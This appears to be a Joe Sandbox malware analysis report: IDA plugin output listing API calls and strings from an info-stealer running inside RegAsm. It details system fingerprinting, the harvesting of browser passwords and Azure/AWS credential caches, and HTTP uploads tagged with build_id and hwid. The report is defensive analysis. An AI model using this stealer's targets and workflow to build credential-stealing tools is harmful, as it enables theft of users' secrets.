                                                                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                          • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                          • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                          • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                          • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                          • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                          • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                          • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                          • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                          • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                          • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                          • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                          • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                          • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                          • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                          • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                          • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                          • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                          • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                          • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                          • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                          • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                          • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                          • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                          • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                          • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                          • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                          • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                          • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                          • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                          • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                          • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                        • API String ID: 3279995179-1014693891
                                                                                                                                                        • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                        • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                                                        • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                        • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                          • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                        • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                        • API String ID: 2840494320-4129404369
                                                                                                                                                        • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                        • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                                                        • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                        • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                        • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                        • API String ID: 1956182324-347816968

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                        • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                                                        • API String ID: 3006978581-858375883
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                        • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                        • _time64.MSVCRT ref: 0040170E
                                                                                                                                                        • srand.MSVCRT ref: 00401715
                                                                                                                                                        • rand.MSVCRT ref: 0040171E
                                                                                                                                                        • _memset.LIBCMT ref: 0040172E
                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                        • _memset.LIBCMT ref: 00401763
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                        • _memset.LIBCMT ref: 004017BE
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                        • String ID: %s%s$delays.tmp
                                                                                                                                                        • API String ID: 1620473967-1413376734
                                                                                                                                                        • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                        • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                                                        • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                        • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004164E2
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                        • _memset.LIBCMT ref: 00416556
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                        • _memset.LIBCMT ref: 004165CA
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                                                        • _memset.LIBCMT ref: 0041663E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                        • API String ID: 4216275855-974132213
                                                                                                                                                        • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                        • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                                                        • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                        • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1956182324-0
                                                                                                                                                        • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                        • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                        • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                        • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
